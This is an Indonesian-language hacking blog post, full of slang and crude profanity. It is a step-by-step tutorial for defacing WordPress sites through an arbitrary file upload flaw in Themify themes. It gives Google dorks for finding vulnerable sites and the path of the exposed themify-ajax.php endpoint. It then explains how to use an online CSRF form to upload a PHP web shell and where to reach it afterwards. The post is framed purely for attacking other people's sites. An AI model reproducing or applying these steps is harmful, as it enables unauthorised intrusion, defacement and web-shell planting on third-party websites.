Tutorial Deface WP Themify Ajax Arbitrary File Upload

Yo wassap gays gua masih stay disini anjink, gua sangat-sangat berterimakasih buat kalian semua ya ngentos karna masih stay bareng gua disini, oke sekian lama gua ga ngepost (maklum lah anak sholeh mah bertapa dulu di goa) dan akhirnya bertemu pada titik "pengen nulis" dan yha, walopun pengen nulis tapi gua bingung mau nulis apaan, ini aja gua gajelas nulis apa.

Yodah deh, daripada kontol-kontolan basa-basi mulu daritadi, jadi gini, anda tau memek ngehek ? ya ngehek adalah cara yang biasa dipakai sama heker heker itu. disini gua mau share tutorial ngehek teknik ninja WP Themify Ajax Arbitrary File Upload , langsung ae ke tutor yha jynx kawand-kawand queh sekalian.

Bahan : 

1. Dork
inurl:"/wp-content/themes/Pinboard/"
inurl:"/wp-content/themes/Folo/"
inurl:"/wp-content/themes/grido/"

(gunakan otak hentai kalian buat ngembangin dork supaya dapet yang pulen + bukan bekas orang ye hh)

2. Exploit
/wp-content/themes/(select theme)/themify/themify-ajax.php
3. CSRF
CSRF Onlen : Klik here
CSRF Manual : Cari sj sendiri jink w g tw

Tutorial :

1. Kek biasa, meluncur ke google.com , wat dorking
2. Cari target lo
3. Masukkin exploitnya, Ex : http://site.co.li/wp-content/themes/jancok/themify/themify-ajax.php
4. VULN = BLANK (tapi ga semua yang blank berarti vuln, semua bergantung pada FF)

ne pulen y

5. Masukkin target lo ke CSRF onlen, Copy kabeh URLnya Ex : http://site.co.li/wp-content/themes/jancok/themify/themify-ajax.php

kek gini cok

6. Klik "Targeted", nanti muncul form uploadnya.

7. Cari file yang mau di upload, klik "Upload Shell"

8. Kalo muncul nama file, berarti itu udah ke upload. Tinggal panggil ae

iki contone cok

Shell akses : site.co.li/wp-content/(ur theme)/uploads/urfile.php

Nah, kalo dh kek gitu serah lo dah mau di apain, saran sih jangan di apa2in mending jadiin koleksi aja hh

Oke sekian sj tutor unfaedah kali ini, semoga berfaedah.

Assalaimualaikum.

Author : Aldiva Media

Share this